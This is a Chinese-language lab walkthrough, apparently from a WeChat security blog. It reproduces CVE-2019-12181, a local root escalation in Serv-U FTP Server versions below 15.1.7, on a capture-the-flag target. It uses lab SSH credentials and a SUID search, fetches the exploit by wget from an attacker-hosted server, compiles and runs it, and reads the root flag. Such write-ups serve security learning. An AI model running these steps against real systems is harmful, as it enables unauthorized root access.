-
OSCP相关技术(备考中)
-
CISSP备考经验(已通过认证)
-
CCSK(云安全)(已通过认证)
-
ISO/IEC 27001 Foundation(已通过认证)
----------------------------------------------------------
本文题干阅读时间推荐5min,练习推荐1h
----------------------------------------------------------
如果各位童鞋想讨论以下相关内容,欢迎关注公众号, 联系我:
-----------------------------------------------------------
0x01 漏洞说明
Serv-U是Windows平台和Linux平台的安全FTP服务器(FTPS, SFTP, HTTPS),是一个优秀的、安全的文件管理、文件传输和文件共享的解决方案。同时也是应用最广泛的FTP服务器软件。
0x02 漏洞影响
Serv-U FTP Server < 15.1.7
0x03 前置声明
PS:本次借助靶场其他漏洞拿到了www的边界权限,并且成功登录后
0x04 漏洞复现
01、突破边界,拿到ssh账号密码
1、SSH登录( love/P@$$w0rd@123),查看id及www目录权限的用户flag
02、提权
2、这里用find找特殊权限的时候居然看到有一个Serv-U,比较不常见
/usr/local/ :用户级的程序目录,可以理解为C:/Progrem Files/用户自己编译的软件默认会安装到这个目录下。
lovetype f 2>/dev/null :~$ find / -perm -u=s -
3、查看Serv-U的版本号
love@election:/usr/local/Serv-U$ cat Serv-U-StartupLog.txt
4、查了版本,那就索性去kali库中查看Serv-U的漏洞列表,下载下来查看详情
└─$ searchsploit Serv-U 15.1
可以发现提权命令:gcc servu-pe-cve-2019-12181.c -o pe && ./pe
5、在攻击机搭建服务,备用靶机来下载文件
└─$ python -m http.server 80
6、靶机下载脚本:
love@election:~$ wget http://192.168.169.129/47009.c
love@election:~$ ls -la
7、运行gcc命令,获取root权限,查看靶机ip,查看root权限下的flag
love@election:~$ gcc 47009.c -o pe && ./pe
# ip a
# cat /root/root.txt
5238feefc4ffe09645d97e9ee49bc3a6
-----------------------------------------------
本期漏洞复现就结束啦,下期见!
--------------------------------------------------
注意:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!~
走之前记得点个“在看”哟~
原文始发于微信公众号(从放弃到入门):【漏洞复现】CVE-2019-12181 Serv-U FTP Server < 15.1.7 - 本地提权漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论